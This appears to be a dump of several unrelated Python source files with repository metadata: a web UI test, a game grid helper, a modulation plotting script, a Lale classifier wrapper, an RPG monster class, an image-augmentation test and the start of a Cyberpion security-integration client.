scenario.refresh()
# initially, the volunteer feature is disabled
browser.visit('/')
assert not browser.is_text_present('Helfen')
# once activated, it is public
browser.login_admin()
browser.visit('/feriennet-settings')
browser.fill_form({
'volunteers': 'enabled',
'tos_url': 'https://example.org/tos'
})
browser.find_by_value("Absenden").click()
browser.visit('/')
assert browser.is_text_present('Helfen')
# users can sign up as volunteers
browser.click_link_by_text("Helfen")
assert browser.is_text_present("Begleiter")
assert not browser.is_element_present_by_css('.volunteer-cart-item')
browser.click_link_by_partial_text("Zu meiner Liste")
assert browser.is_element_present_by_css('.volunteer-cart-item')
browser.click_link_by_text("Als Helfer registrieren")
browser.fill_form({
'first_name': "Foo",
'last_name': "Bar",
'birth_date': '06.04.1984',
'address': 'Foostreet 1',
'zip_code': '1234',
'place': 'Bartown',
'email': '[email protected]',
'phone': '1234'
})
browser.find_by_value("Absenden").click()
# the volunteer is not in the helpers list yet
browser.visit('/attendees/zoo')
assert not browser.is_text_present("Foo")
# the admin can see the signed up users
browser.visit(f'/volunteers/{scenario.latest_period.id.hex}')
assert browser.is_text_present("Foo")
assert not browser.is_text_present("Bestätigt")
browser.find_by_css('.actions-button').first.click()
browser.find_link_by_partial_text("Als bestätigt markieren")
browser.click_link_by_partial_text("Als bestätigt markieren")
assert browser.is_text_present("Bestätigt")
# now the volunteer is in the list
browser.visit('/attendees/zoo')
assert browser.is_text_present("Foo")
| 33.264808 | 79 | 0.69006 |
91b3d0d38d6da9f410a5761f48be3c9bec26cdaa
| 49 |
py
|
Python
|
pyramid-creator/app/config.py
|
jinnn-dev/patholearn
|
b4e6a18cfbf963e71640ed6cac3fc3a618a7ae15
|
[
"MIT"
] | 1 |
2022-02-20T12:45:04.000Z
|
2022-02-20T12:45:04.000Z
|
pyramid-creator/app/config.py
|
JamesNeumann/learning-by-annotations
|
c2b5e4b653eeb1c973aa5a7dad35ac8be18cb1ad
|
[
"MIT"
] | 21 |
2021-11-01T10:13:56.000Z
|
2021-12-02T10:02:13.000Z
|
pyramid-creator/app/config.py
|
jinnn-dev/patholearn
|
b4e6a18cfbf963e71640ed6cac3fc3a618a7ae15
|
[
"MIT"
] | 1 |
2021-12-16T18:20:55.000Z
|
2021-12-16T18:20:55.000Z
|
class Config:
TEMP_IMAGES_FOLDER = "/data"
| 16.333333 | 33 | 0.673469 |
91bcdfeee7af286bb3aada18c0cb79b683a3032d
| 4,852 |
py
|
Python
|
bots/botutilities/grid.py
|
jorgeparavicini/FourWins
|
1c5e8a23b4464ef6b71d70c9ff040aa004b9ca83
|
[
"MIT"
] | 1 |
2021-01-20T18:33:01.000Z
|
2021-01-20T18:33:01.000Z
|
bots/botutilities/grid.py
|
jorgeparavicini/FourWins
|
1c5e8a23b4464ef6b71d70c9ff040aa004b9ca83
|
[
"MIT"
] | null | null | null |
bots/botutilities/grid.py
|
jorgeparavicini/FourWins
|
1c5e8a23b4464ef6b71d70c9ff040aa004b9ca83
|
[
"MIT"
] | 2 |
2019-09-04T08:27:14.000Z
|
2019-09-06T20:32:30.000Z
|
from __future__ import annotations
from typing import TypeVar, List, Generic, Callable
T = TypeVar('T')
"""
GRID LAYOUT
(0,2) (1,2) (2,2)
(0,1) (1,1) (2,1)
(0,0) (1,0) (2,0)
"""
class Grid(Generic[T]):
def __init__(self, grid: List[List[T]]):
self.__grid = grid
if len(grid) > 0 and len(grid[0]) > 0:
self.__width = len(grid[0])
self.__height = len(grid)
else:
self.__width = 0
self.__height = 0
@staticmethod
def empty():
return Grid(grid=[])
@property
def width(self):
return self.__width
@property
def height(self):
return self.__height
@classmethod
def create(cls, width: int, height: int, default: T = 0) -> Grid[T]:
return cls([x[:] for x in [[default] * width] * height])
def at(self, x: int, y: int) -> T:
return self.__grid[y][x]
def set_at(self, x: int, y: int, val: T):
self.__grid[y][x] = val
# Declare generic parameter for Mapped Callback
S = TypeVar('S')
# We map all values from the current Grid which all have type T, to type S
def map(self, func: Callable[[T], S]) -> Grid[S]:
return Grid([list(map(func, row)) for row in self.__grid])
def row(self, at: int) -> List[T]:
return self.__grid[at]
def column(self, at: int) -> List[T]:
return [row[at] for row in self.__grid]
def is_column_full(self, column: int) -> bool:
        return self.column(column)[-1] != 0
def print(self):
for row in reversed(self.__grid):
print(row)
def check_horizontal_group_at(self, bot_id: int, x: int, y: int) -> int:
assert (0 <= x < self.width)
if self.at(x, y) != bot_id:
return 0
result = 1
current_x = x
# go right
while True:
if current_x >= self.width - 1:
break
current_x += 1
if self.at(current_x, y) == bot_id:
result += 1
else:
break
current_x = x
while True:
if current_x <= 0:
break
current_x -= 1
if self.at(current_x, y) == bot_id:
result += 1
else:
break
return result
def check_vertical_group_at(self, bot_id: int, x: int, y: int) -> int:
assert 0 <= y < self.height
if self.at(x, y) != bot_id:
return 0
result = 1
current_y = y
while True:
if current_y >= self.height - 1:
break
current_y += 1
if self.at(x, current_y) == bot_id:
result += 1
else:
break
current_y = y
while True:
if current_y <= 0:
break
current_y -= 1
if self.at(x, current_y) == bot_id:
result += 1
else:
break
return result
def check_forward_diagonal_group_at(self, bot_id: int, x: int, y: int) -> int:
assert 0 <= x < self.width
assert 0 <= y < self.height
if self.at(x, y) != bot_id:
return 0
result = 1
current_x = x
current_y = y
while True:
if current_y >= self.height - 1 or current_x >= self.width - 1:
break
current_x += 1
current_y += 1
if self.at(current_x, current_y) == bot_id:
result += 1
else:
break
current_x = x
current_y = y
while True:
if current_x <= 0 or current_y <= 0:
break
current_x -= 1
current_y -= 1
if self.at(current_x, current_y) == bot_id:
result += 1
else:
break
return result
def check_backward_diagonal_group_at(self, bot_id: int, x: int, y: int) -> int:
assert 0 <= x < self.width
assert 0 <= y < self.height
if self.at(x, y) != bot_id:
return 0
result = 1
current_x = x
current_y = y
while True:
if current_y >= self.height - 1 or current_x <= 0:
break
current_x -= 1
current_y += 1
if self.at(current_x, current_y) == bot_id:
result += 1
else:
break
current_y = y
current_x = x
while True:
if current_y <= 0 or current_x >= self.width - 1:
break
current_x += 1
current_y -= 1
if self.at(current_x, current_y) == bot_id:
result += 1
else:
break
return result
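# --- Example (added for illustration; not part of the original module) ---
# A minimal sketch of how the group-counting helpers are used: drop three
# pieces for bot 1 into the bottom row and count the horizontal run. The
# board size (7x6, as in Four Wins) is an assumption made for this demo.
if __name__ == "__main__":
    demo = Grid.create(width=7, height=6, default=0)
    for col in (2, 3, 4):
        demo.set_at(col, 0, 1)
    demo.print()
    # Expect 3: the piece at (3, 0) sits in a horizontal run of length 3.
    print(demo.check_horizontal_group_at(bot_id=1, x=3, y=0))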
| 25.536842 | 83 | 0.476298 |
37ce90a519ae0c88b8597cbc9e32c992964ff468
| 5,810 |
py
|
Python
|
doc/fb_memoir/python/combined.py
|
ghsecuritylab/project-powerline
|
6c0ec13bbfc11c3790c506f644db4fe45021440a
|
[
"MIT"
] | null | null | null |
doc/fb_memoir/python/combined.py
|
ghsecuritylab/project-powerline
|
6c0ec13bbfc11c3790c506f644db4fe45021440a
|
[
"MIT"
] | null | null | null |
doc/fb_memoir/python/combined.py
|
ghsecuritylab/project-powerline
|
6c0ec13bbfc11c3790c506f644db4fe45021440a
|
[
"MIT"
] | 1 |
2020-03-08T01:50:58.000Z
|
2020-03-08T01:50:58.000Z
|
#!/usr/bin/env python3
import sympy as sp
import numpy as np
import matplotlib.pyplot as plt
# Approx 10 kHz
w = 66e3
deltaW = 33e3
T = 2 * np.pi / w
T_lo = 2 * np.pi / (w - deltaW)
T_hi = 2 * np.pi / (w + deltaW)
A1 = 5
A2 = 30
A = 1.5
x = sp.Symbol('x')
#func1 = 1/2 * (2 + sp.cos(2*w1*x) + sp.cos(2*w2*x) + 2*sp.cos((w1+w2)*x) + 2*sp.cos((w1-w2)*x))
ask_mod_lo = A1 * sp.sin(w * x)
ask_mod_hi = A2 * sp.sin(w * x)
ask_mod_hi_2 = A2 * sp.sin(w * x + np.pi/2) # Short-circuit version
ask_mod_lo_ld = sp.lambdify(x,ask_mod_lo, modules=['numpy'])
ask_mod_hi_ld = sp.lambdify(x,ask_mod_hi, modules=['numpy'])
ask_mod_hi_ld_2 = sp.lambdify(x,ask_mod_hi_2, modules=['numpy'])
fsk_carrier = A * sp.sin(w * x - sp.pi/2)
fsk_mod_lo = A * sp.sin((w - deltaW) * x - sp.pi/2)
fsk_mod_hi = A * sp.sin((w + deltaW) * x - sp.pi/2)
fsk_carrier_ld = sp.lambdify(x,fsk_carrier, modules=['numpy'])
fsk_mod_lo_ld = sp.lambdify(x,fsk_mod_lo, modules=['numpy'])
fsk_mod_hi_ld = sp.lambdify(x,fsk_mod_hi, modules=['numpy'])
# From 0 to 10 milliseconds
t = np.linspace(0,16*T,1000)
t_lo_1 = np.linspace( 0, 4*T, 1000)
t_hi_1 = np.linspace( 4*T, 4*T + 4*T, 1000)
t_lo_2 = np.linspace(4*T + 4*T, 8*T + 4*T, 1000)
t_hi_2 = np.linspace(8*T + 4*T, 8*T + 8*T, 1000)
plt.rc('text',usetex=True)
plt.rc('font',family='serif',size=11)
plt.rc('legend', fontsize=9)
plt.rc('axes', labelsize=9, titlesize=11)
plt.rc('xtick', labelsize=9)
plt.rc('ytick', labelsize=9)
plt.rc('savefig', transparent=True)
plt.rc('lines', linewidth=0.5)
plt.rc('axes',linewidth=0.5)
fig1 = plt.figure(num=1,figsize=(10,15))
#fig1.suptitle(r'Frequenzanteile bei Intensit\"at einer Schwebung')
# Data
ax1 = fig1.add_subplot(511)
ax1.plot([ 0, 4*T], [0,0], color='blue')
ax1.plot([ 4*T, 4*T], [0,1], color='grey')
ax1.plot([ 4*T, 8*T], [1,1], color='magenta')
ax1.plot([ 8*T, 8*T], [1,0], color='grey')
ax1.plot([ 8*T, 12*T], [0,0], color='blue')
ax1.plot([12*T, 12*T], [0,1], color='grey')
ax1.plot([12*T, 16*T], [1,1], color='magenta')
ax1.set_ylim([-0.1,1.1])
ax1.set_xlim([0,16*T])
ax1.set_title("Daten")
ax1.set_ylabel('Symbol')
ax1.set_xlabel('Zeit')
ax1.get_xaxis().set_ticks([]);
ax1.get_yaxis().set_ticks([0,1]);
# Modulated Signal, FSK
ax2 = fig1.add_subplot(512)
ax2.plot(t_lo_1, fsk_mod_lo_ld(t_lo_1), label=r"Tr\"agerfrequenz", color='blue')
ax2.plot(t_hi_1, fsk_mod_hi_ld(t_hi_1), label=r"Tr\"agerfrequenz", color='magenta')
ax2.plot(t_lo_2, fsk_mod_lo_ld(t_lo_2), label=r"Tr\"agerfrequenz", color='blue')
ax2.plot(t_hi_2, fsk_mod_hi_ld(t_hi_2), label=r"Tr\"agerfrequenz", color='magenta')
ax2.set_ylim([-1.1 * A, 1.1 * A])
ax2.set_xlim([0,16*T])
ax2.set_title(r"Moduliertes Signal, FSK")
ax2.set_ylabel('Spannung')
ax2.set_xlabel('Zeit')
ax2.get_xaxis().set_ticks([]);
ax2.get_yaxis().set_ticks([]);
# Modulated Signal, ASK
ax3 = fig1.add_subplot(513)
ax3.plot(t_lo_1, ask_mod_lo_ld(t_lo_1), label=r"Tr\"agerfrequenz", color='blue')
ax3.plot(t_hi_1, ask_mod_hi_ld(t_hi_1), label=r"Tr\"agerfrequenz", color='magenta')
ax3.plot(t_lo_2, ask_mod_lo_ld(t_lo_2), label=r"Tr\"agerfrequenz", color='blue')
ax3.plot(t_hi_2, ask_mod_hi_ld(t_hi_2), label=r"Tr\"agerfrequenz", color='magenta')
ax3.set_ylim([-1.1 * A2, 1.1 * A2])
ax3.set_xlim([0,16*T])
ax3.set_title(r"Moduliertes Signal, ASK")
ax3.set_ylabel('Spannung')
ax3.set_xlabel('Zeit')
ax3.get_xaxis().set_ticks([]);
ax3.get_yaxis().set_ticks([]);
# Modulated Signal, OOK, Oscillator
ax4 = fig1.add_subplot(514)
ax4.plot([0, 4*T], [0,0] , color='blue')
ax4.plot(t_hi_1, ask_mod_hi_ld(t_hi_1), label=r"Tr\"agerfrequenz", color='magenta')
ax4.plot([8*T, 12*T], [0,0], color='blue')
ax4.plot(t_hi_2, ask_mod_hi_ld(t_hi_2), label=r"Tr\"agerfrequenz", color='magenta')
ax4.set_ylim([-1.1 * A2, 1.1 * A2])
ax4.set_xlim([0,16*T])
ax4.set_title(r"Moduliertes Signal, OOK, Oszillator")
ax4.set_ylabel('Spannung')
ax4.set_xlabel('Zeit')
ax4.get_xaxis().set_ticks([]);
ax4.get_yaxis().set_ticks([]);
# Modulated Signal, Short-Circuit
ax5 = fig1.add_subplot(515)
ax5.plot([ 0, 4*T], [960,960], color='blue')
ax5.step([ 4*T + T/2 * 0, 4*T + T/2 ], [960,900], color='magenta')
ax5.step([ 4*T + T/2 * 1, 4*T + T/2 * 2], [900,960], color='magenta')
ax5.step([ 4*T + T/2 * 2, 4*T + T/2 * 3], [960,900], color='magenta')
ax5.step([ 4*T + T/2 * 3, 4*T + T/2 * 4], [900,960], color='magenta')
ax5.step([ 4*T + T/2 * 4, 4*T + T/2 * 5], [960,900], color='magenta')
ax5.step([ 4*T + T/2 * 5, 4*T + T/2 * 6], [900,960], color='magenta')
ax5.step([ 4*T + T/2 * 6, 4*T + T/2 * 7], [960,900], color='magenta')
ax5.step([ 4*T + T/2 * 7, 4*T + T/2 * 8], [900,960], color='magenta')
ax5.plot([ 8*T, 12*T], [960,960], color='blue')
ax5.step([12*T + T/2 * 0, 12*T + T/2 ], [960,900], color='magenta')
ax5.step([12*T + T/2 * 1, 12*T + T/2 * 2], [900,960], color='magenta')
ax5.step([12*T + T/2 * 2, 12*T + T/2 * 3], [960,900], color='magenta')
ax5.step([12*T + T/2 * 3, 12*T + T/2 * 4], [900,960], color='magenta')
ax5.step([12*T + T/2 * 4, 12*T + T/2 * 5], [960,900], color='magenta')
ax5.step([12*T + T/2 * 5, 12*T + T/2 * 6], [900,960], color='magenta')
ax5.step([12*T + T/2 * 6, 12*T + T/2 * 7], [960,900], color='magenta')
ax5.step([12*T + T/2 * 7, 12*T + T/2 * 8], [900,960], color='magenta')
ax5.set_ylim([890,970])
ax5.set_xlim([0,16*T])
ax5.set_title(r"Moduliertes Signal, OOK, Kurzschluss \"uber Modul")
ax5.set_ylabel('Spannung')
ax5.set_xlabel('Zeit')
ax5.get_xaxis().set_ticks([]);
ax5.get_yaxis().set_ticks([]);
fig1.subplots_adjust(bottom=0.05,top=0.95,left=0.10,right=0.95,hspace=0.45)
#fig1.set_figwidth(5.314) # Textwidth
fig1.set_figwidth(5.1)
# fig1.set_figheight(6.5)
fig1.set_figheight(8)
#fig1.subplots_adjust(bottom=0.01,top=0.99,left=0.05,right=0.99)
fig1.savefig('../images/python/modulation.pgf')
#plt.show()
| 37.727273 | 96 | 0.640448 |
72eda700c15050a4608c5a0b8f7c7eea8f3cf744
| 282 |
py
|
Python
|
9.10.py
|
RonaldZhao/NowCoder
|
935af39835a98efc14157e20df1e3458e02b9803
|
[
"MIT"
] | null | null | null |
9.10.py
|
RonaldZhao/NowCoder
|
935af39835a98efc14157e20df1e3458e02b9803
|
[
"MIT"
] | null | null | null |
9.10.py
|
RonaldZhao/NowCoder
|
935af39835a98efc14157e20df1e3458e02b9803
|
[
"MIT"
] | null | null | null |
from functools import reduce  # reduce is not a builtin in Python 3


class TreeCount:
def countWays(self, n):
if n <= 1:
return n
def C(m, n):
            # compute the binomial coefficient C(m, n)
f = lambda x, y: x * y
            return reduce(f, range(m, m - n, -1)) // reduce(f, range(1, n + 1))
        return C(n * 2, n) // (n + 1)
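# Quick check (added for illustration): countWays(n) evaluates the n-th
# Catalan number C(2n, n) // (n + 1); for n = 1..5 this prints [1, 2, 5, 14, 42].
if __name__ == '__main__':
    print([TreeCount().countWays(n) for n in range(1, 6)])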
| 23.5 | 78 | 0.397163 |
f488c6621fa54ad1488c351c9a256506bd7bd1d2
| 7,336 |
py
|
Python
|
lale/lib/autogen/gaussian_process_classifier.py
|
vishalbelsare/lale
|
654ca29ec0234b478d26724a25df28b28f5c0bc0
|
[
"Apache-2.0"
] | 265 |
2019-08-06T14:45:43.000Z
|
2022-03-30T23:57:48.000Z
|
lale/lib/autogen/gaussian_process_classifier.py
|
vishalbelsare/lale
|
654ca29ec0234b478d26724a25df28b28f5c0bc0
|
[
"Apache-2.0"
] | 467 |
2019-08-08T02:01:21.000Z
|
2022-03-25T16:12:00.000Z
|
lale/lib/autogen/gaussian_process_classifier.py
|
vishalbelsare/lale
|
654ca29ec0234b478d26724a25df28b28f5c0bc0
|
[
"Apache-2.0"
] | 81 |
2019-08-07T19:59:31.000Z
|
2022-03-31T09:11:58.000Z
|
from numpy import inf, nan
from sklearn.gaussian_process import GaussianProcessClassifier as Op
from lale.docstrings import set_docstrings
from lale.operators import make_operator
class _GaussianProcessClassifierImpl:
def __init__(self, **hyperparams):
self._hyperparams = hyperparams
self._wrapped_model = Op(**self._hyperparams)
def fit(self, X, y=None):
if y is not None:
self._wrapped_model.fit(X, y)
else:
self._wrapped_model.fit(X)
return self
def predict(self, X):
return self._wrapped_model.predict(X)
def predict_proba(self, X):
return self._wrapped_model.predict_proba(X)
_hyperparams_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "inherited docstring for GaussianProcessClassifier Gaussian process classification (GPC) based on Laplace approximation.",
"allOf": [
{
"type": "object",
"required": [
"kernel",
"optimizer",
"n_restarts_optimizer",
"max_iter_predict",
"warm_start",
"copy_X_train",
"random_state",
"multi_class",
"n_jobs",
],
"relevantToOptimizer": [
"optimizer",
"n_restarts_optimizer",
"max_iter_predict",
"multi_class",
],
"additionalProperties": False,
"properties": {
"kernel": {
"XXX TODO XXX": "kernel object",
"description": "The kernel specifying the covariance function of the GP",
"enum": [None],
"default": None,
},
"optimizer": {
"anyOf": [
{"laleType": "callable", "forOptimizer": False},
{"enum": ["fmin_l_bfgs_b"]},
],
"default": "fmin_l_bfgs_b",
"description": "Can either be one of the internally supported optimizers for optimizing the kernel's parameters, specified by a string, or an externally defined optimizer passed as a callable",
},
"n_restarts_optimizer": {
"type": "integer",
"minimumForOptimizer": 0,
"maximumForOptimizer": 1,
"distribution": "uniform",
"default": 0,
"description": "The number of restarts of the optimizer for finding the kernel's parameters which maximize the log-marginal likelihood",
},
"max_iter_predict": {
"type": "integer",
"minimumForOptimizer": 100,
"maximumForOptimizer": 101,
"distribution": "uniform",
"default": 100,
"description": "The maximum number of iterations in Newton's method for approximating the posterior during predict",
},
"warm_start": {
"type": "boolean",
"default": False,
"description": "If warm-starts are enabled, the solution of the last Newton iteration on the Laplace approximation of the posterior mode is used as initialization for the next call of _posterior_mode()",
},
"copy_X_train": {
"type": "boolean",
"default": True,
"description": "If True, a persistent copy of the training data is stored in the object",
},
"random_state": {
"anyOf": [
{"type": "integer"},
{"laleType": "numpy.random.RandomState"},
{"enum": [None]},
],
"default": None,
"description": "The generator used to initialize the centers",
},
"multi_class": {
"XXX TODO XXX": "string, default",
"description": "Specifies how multi-class classification problems are handled",
"enum": ["one_vs_one", "one_vs_rest"],
"default": "one_vs_rest",
},
"n_jobs": {
"anyOf": [{"type": "integer"}, {"enum": [None]}],
"default": 1,
"description": "The number of jobs to use for the computation",
},
},
}
],
}
_input_fit_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Fit Gaussian process classification model",
"type": "object",
"required": ["X", "y"],
"properties": {
"X": {
"type": "array",
"items": {"type": "array", "items": {"type": "number"}},
"description": "Training data",
},
"y": {
"type": "array",
"items": {"type": "number"},
"description": "Target values, must be binary",
},
},
}
_input_predict_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Perform classification on an array of test vectors X.",
"type": "object",
"required": ["X"],
"properties": {
"X": {"type": "array", "items": {"type": "array", "items": {"type": "number"}}}
},
}
_output_predict_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Predicted target values for X, values are from ``classes_``",
"type": "array",
"items": {"type": "number"},
}
_input_predict_proba_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Return probability estimates for the test vector X.",
"type": "object",
"required": ["X"],
"properties": {
"X": {"type": "array", "items": {"type": "array", "items": {"type": "number"}}}
},
}
_output_predict_proba_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Returns the probability of the samples for each class in the model",
"type": "array",
"items": {"type": "array", "items": {"type": "number"}},
}
_combined_schemas = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Combined schema for expected data and hyperparameters.",
"documentation_url": "https://scikit-learn.org/0.20/modules/generated/sklearn.gaussian_process.GaussianProcessClassifier#sklearn-gaussian_process-gaussianprocessclassifier",
"import_from": "sklearn.gaussian_process",
"type": "object",
"tags": {"pre": [], "op": ["estimator", "classifier"], "post": []},
"properties": {
"hyperparams": _hyperparams_schema,
"input_fit": _input_fit_schema,
"input_predict": _input_predict_schema,
"output_predict": _output_predict_schema,
"input_predict_proba": _input_predict_proba_schema,
"output_predict_proba": _output_predict_proba_schema,
},
}
GaussianProcessClassifier = make_operator(
_GaussianProcessClassifierImpl, _combined_schemas
)
set_docstrings(GaussianProcessClassifier)
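# --- Usage sketch (added for illustration; not part of the generated module) ---
# Hedged example of the usual Lale operator flow: bind hyperparameters, fit,
# then predict. The dataset below is an arbitrary choice for demonstration only.
#
# from sklearn.datasets import load_iris
# X, y = load_iris(return_X_y=True)
# trainable = GaussianProcessClassifier(n_restarts_optimizer=1)
# trained = trainable.fit(X, y)
# predictions = trained.predict(X)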
| 39.654054 | 223 | 0.531625 |
beb90015089d5923b08550d2d8deae199aa7b26b
| 1,955 |
py
|
Python
|
TestBot/test_cogs/rpgFunctions/monster.py
|
austinmh12/DiscordBots
|
55550b68a7ad6423de55e62dbbff93fd88f08ff2
|
[
"MIT"
] | null | null | null |
TestBot/test_cogs/rpgFunctions/monster.py
|
austinmh12/DiscordBots
|
55550b68a7ad6423de55e62dbbff93fd88f08ff2
|
[
"MIT"
] | null | null | null |
TestBot/test_cogs/rpgFunctions/monster.py
|
austinmh12/DiscordBots
|
55550b68a7ad6423de55e62dbbff93fd88f08ff2
|
[
"MIT"
] | null | null | null |
from .. import sql, log, BASE_PATH, chunk, Page
from random import randint, random, choice
from math import floor  # floor is used below; imported explicitly so the module is self-contained
from . import *
#############
# Constants #
#############
#############
# Functions #
#############
def get_monsters():
df = sql('rpg', 'select * from monsters')
if df.empty:
return []
return [Monster(**d) for d in df.to_dict('records')]
def get_monster(name):
df = sql('rpg', 'select * from monsters where name = ?', (name,))
if df.empty:
return None
return Monster(**df.to_dict('records')[0])
# TODO: Add add_monster function for admin
###########
# Classes #
###########
class Monster:
def __init__(self,
name,
primary_stat,
secondary_stat,
min_damage,
max_damage,
crit_chance,
base_str,
base_dex,
base_int,
base_con,
str_mod,
dex_mod,
int_mod,
con_mod,
base_exp,
exp_mod
):
self.name = name
self.primary_stat = primary_stat
self.secondary_stat = secondary_stat
self.min_damage = min_damage
self.max_damage = max_damage
self.crit_chance = crit_chance
self.base_str = base_str
self.base_dex = base_dex
self.base_int = base_int
self.base_con = base_con
self.str_mod = str_mod
self.dex_mod = dex_mod
self.int_mod = int_mod
self.con_mod = con_mod
self.base_exp = base_exp
self.exp_mod = exp_mod
def generate_stats(self, level):
s = self.base_str + (level * self.str_mod)
d = self.base_dex + (level * self.dex_mod)
i = self.base_int + (level * self.int_mod)
c = self.base_con + (level * self.con_mod)
self.stats = {'STR': s, 'DEX': d, 'INT': i, 'CON': c}
self.current_con = c * 10
self.level = level
@property
def defense(self):
return 80 / (80 + self.stats['STR'])
@property
def damage(self):
dmg = randint(self.level, floor(self.level * 1.25))
dmg += floor(self.stats.get(self.primary_stat, 0) / 10)
dmg += floor(self.stats.get(self.secondary_stat, 0) / 20)
if random() < self.crit_chance:
dmg *= 1.5
return dmg
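# --- Usage sketch (added for illustration; not part of the original cog) ---
# Monsters are read from the database and then levelled for an encounter;
# the name 'Slime' below is an assumption, not actual database content.
#
# slime = get_monster('Slime')
# slime.generate_stats(level=5)   # derives STR/DEX/INT/CON and current_con
# hit = slime.damage              # random damage roll, may crit for 1.5x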
| 22.732558 | 66 | 0.640409 |
fe8624c73ab06467e18a8973fb28b74989f0036c
| 3,547 |
py
|
Python
|
research/cv/autoaugment/src/dataset/autoaugment/aug_test.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 1 |
2021-07-03T06:52:20.000Z
|
2021-07-03T06:52:20.000Z
|
research/cv/autoaugment/src/dataset/autoaugment/aug_test.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | null | null | null |
research/cv/autoaugment/src/dataset/autoaugment/aug_test.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 2 |
2019-09-01T06:17:04.000Z
|
2019-10-04T08:39:45.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
Visualization for testing purposes.
"""
import sys
import matplotlib.pyplot as plt
import numpy as np
import mindspore.dataset as ds
from mindspore import context
context.set_context(mode=context.GRAPH_MODE, device_target='CPU')
def compare(data_path, index=None, ops=None, rescale=False):
"""Visualize images before and after applying auto-augment."""
# Load dataset
ds.config.set_seed(8)
dataset_orig = ds.Cifar10Dataset(
data_path,
num_samples=5,
shuffle=True,
)
# Apply transformations
dataset_augmented = dataset_orig.map(
operations=[Augment(index)] if ops is None else ops,
input_columns=['image'],
)
# Collect images
image_orig_list, image_augmented_list, label_list = [], [], []
for data in dataset_orig.create_dict_iterator():
image_orig_list.append(data['image'])
label_list.append(data['label'])
print('Original image: shape {}, label {}'.format(
data['image'].shape, data['label'],
))
for data in dataset_augmented.create_dict_iterator():
image_augmented_list.append(data['image'])
print('Augmented image: shape {}, label {}'.format(
data['image'].shape, data['label'],
))
num_samples = len(image_orig_list)
fig, mesh = plt.subplots(ncols=num_samples, nrows=2, figsize=(5, 3))
axes = mesh[0]
for i in range(num_samples):
axes[i].axis('off')
axes[i].imshow(image_orig_list[i].asnumpy())
axes[i].set_title(label_list[i].asnumpy())
axes = mesh[1]
for i in range(num_samples):
axes[i].axis('off')
img = image_augmented_list[i].asnumpy().transpose((1, 2, 0))
if rescale:
max_val = max(np.abs(img.min()), img.max())
img = (img / max_val + 1) / 2
print('min and max of the transformed image:', img.min(), img.max())
axes[i].imshow(img)
fig.tight_layout()
fig.savefig(
'aug_test.png' if index is None else 'aug_test_{}.png'.format(index),
)
if __name__ == '__main__':
sys.path.append('..')
from autoaugment.third_party.policies import good_policies
from autoaugment import Augment
cifar10_data_path = './cifar-10-batches-bin/'
# Test the feasibility of each policy
for ind, policy in enumerate(good_policies()):
if ind >= 3:
pass
# break
print(policy)
compare(cifar10_data_path, ind)
# Test the random policy selection and the normalize operation
MEAN = [0.49139968, 0.48215841, 0.44653091]
STD = [0.24703223, 0.24348513, 0.26158784]
compare(
cifar10_data_path,
ops=[Augment(mean=MEAN, std=STD, enable_basic=False)],
)
compare(
cifar10_data_path,
ops=[Augment(mean=MEAN, std=STD, enable_basic=False)],
rescale=True,
)
| 33.149533 | 78 | 0.638286 |
43070d1cdd1c7060e4669542841e1169dc229696
| 17,520 |
py
|
Python
|
Packs/Cyberpion/Integrations/Cyberpion/Cyberpion.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Cyberpion/Integrations/Cyberpion/Cyberpion.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Cyberpion/Integrations/Cyberpion/Cyberpion.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto # noqa: F401
from typing import Dict, Tuple, List
from datetime import timezone
from CommonServerPython import *
"""Cyberpion Integration for Cortex XSOAR (aka Demisto)
"""
''' IMPORTS '''
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' CONSTANTS '''
DATE_FORMAT = '%Y-%m-%d %H:%M:%S.%f %Z'
DEFAULT_MAX_INCIDENTS_TO_FETCH = 200
CONNECTION_TIMEOUT = 30.0
READ_TIMEOUT = 30.0
VALID_STATUS_CODES = (200,)
NUM_OF_RETRIES = 3
BACKOFF_FACTOR = 1.0 # see documentation in CommonServerPython._http_request
ACTION_ITEM_TYPE_NAME = 'cyberpion_action_item'
''' CLIENT CLASS '''
class Client(BaseClient):
"""Client class to interact with the service API
This Client implements API calls, and does not contain any Demisto logic.
Should only do requests and return data.
It inherits from BaseClient defined in CommonServer Python.
Most calls use _http_request() that handles proxy, SSL verification, etc.
For this implementation, no special attributes defined
"""
def get_domain_state(self, domain: str):
params = {
'verbosity': 'details',
'domain': domain
}
demisto.debug(f'getting domain state for domain- {domain}')
http_response = self._http_request(
method='GET',
url_suffix='/domainstate/',
params=params,
resp_type='json',
ok_codes=VALID_STATUS_CODES,
timeout=(CONNECTION_TIMEOUT, READ_TIMEOUT),
retries=NUM_OF_RETRIES,
backoff_factor=BACKOFF_FACTOR,
raise_on_status=True
)
if 'results' not in http_response:
